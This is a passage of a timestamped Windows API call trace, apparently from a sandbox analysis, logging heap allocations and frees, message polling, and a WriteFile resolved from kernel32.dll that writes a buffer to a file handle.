hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x698698 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0075.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.181] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.181] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0075.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0075.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690780 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906b0 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0075.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0075.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690920 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690710 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e540 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0075.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0075.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.183] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0075.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.186] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.187] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa) returned 0x76e210 [0075.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x76e210, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0075.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.187] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0075.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.188] WriteFile (in: hFile=0x128, lpBuffer=0x6a0b20*, nNumberOfBytesToWrite=0x44c1, lpNumberOfBytesWritten=0x61e598, lpOverlapped=0x0 | out: lpBuffer=0x6a0b20*, lpNumberOfBytesWritten=0x61e598*=0x44c1, lpOverlapped=0x0) returned 1 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: 